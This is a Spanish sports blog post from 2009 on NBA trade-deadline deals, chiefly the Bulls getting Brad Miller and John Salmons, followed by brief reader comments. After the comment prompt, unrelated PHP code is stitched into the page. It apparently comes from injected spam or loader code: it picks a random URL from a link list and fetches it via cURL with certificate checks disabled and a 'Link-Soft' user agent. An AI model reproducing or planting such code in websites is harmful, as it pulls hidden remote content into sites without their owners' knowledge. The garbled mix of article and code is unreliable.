Los Bulls se hacen con Brad Miller y John Salmons

19 de February de 2009 por txusma

¡Cómo nos gustan los últimos días antes de que se cierre el mercado en la NBA! Rumorología, emoción a raudales, nervios todas las mañanas para comprobar si tu equipo ha hecho este o aquel movimiento. Uno de los puntes culminantes de la temporada. La última oportunidad para muchas franquicias para enderezar su tortusoso camino o la confirmación de abandono para muchas otras.

Del día de ayer hemos de destacar sin dudarlo el traspaso que ha acabado con John Salmons y Brad Miller en los Bulls a cambio de Andres Nocioni y Drew Gooden. Completariamente los Kings han traspasado a Michael Ruffin a los Blazers a cambio del número 9 del draft de 2005, Ike Diogu. Los Bulls consiguen de este modo el pívot que les faltaba para completar la plantilla y que en teoría ha de acompañar a Tyrus Thomas en su juego interior. Además se hacen con los servicios de John Salmons en lo que podría ser todo un aviso para Ben Gordon y sus reinvidicaciones. A cambio han perdido el expiring de Gooden (la única razón por la que puede interesar a Sacramento) y se han deshecho de Nocioni y sus 28 millones en 4 años.

La otra noticía destacada del día es que el traspaso que anunciábamos ayer entre NOH y OKH ha sido suspendido debido a que Tyson Chandler no ha pasado la revisión médica con el que tenía que ser su nuevo equipos. Todo un golpe para ambas franquicias.

Pero tenemos más noticias y rumores:

Chris Mihm se ha ido a los Grizzlies a cambio de una elección en el draft.
Hay un rumor que involucra a Rudy Fernández y Sergio Rodríguez: El que les llevaría a Detroit junto con Raef Lafrentz a cambio de Tayshaun Prince y Kwame Brown.
– Minnessotta está muy interesado en hacerse con los servicios de Kirk Hinrich aunque las conversaciones están en punto muerto.
Houston Rockets podría estar negociando con los Clippers para incorporar a Baron Davis. Por otro lado se habla de que la franquicia angelina podría haber ofrecido al base a Mavericks y Warriors.
Larry Hughes también podría salir de los Bulls. Se habla de un traspaso a los Wizards o a los Knicks.
– Tanto Allen Iverson como Rasheed Wallace, ambos expirings, podrían cambiar de equipo.
– San Antonio sigue interesado en Vince Carter y ahora también en Richard Jefferson.
– Los Cavaliers harán un último intento para hacerse con los servicios de Marcus Camby. De no logarlo su objetivo pasaría a ser Antawn Jamison.
– Los Blazers siguen buscando alero siempre con el expiring de Lafrentz como moneda de cambio: aparte de Tayshaun Prince, los mejores situados son Vince Carter y Gerald Wallace.

Comenta

4 comentarios a esta entrada

  1. Viva_Dirk dice:
    #1

    Pues equipete majo que les queda a los Bulls, Rose-Gordon-Deng-Tyrus-Miller, con tios en el banco como Hinrich y Salmons.

      Citar

  2. telekoman dice:
    #2

    Quiero a Rudy en Detroit, ya.

      Citar

  3. kantonyo dice:
    #3

    Yo creo que le viene mejor a Rudy cambiar de aires que al mismo Sergio. Rudy en este momento puede ser importante para cualqueir franquicia, y Detroit sería una de ellas.

      Citar

  4. Jabho dice:
    #4

    Buen movimiento el de los bulls y Miller era un jugador sin sentido en Sac. Es un buen jugador que puede dar mucha consistencia al juego interior los próximos 2 o 3 años…

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>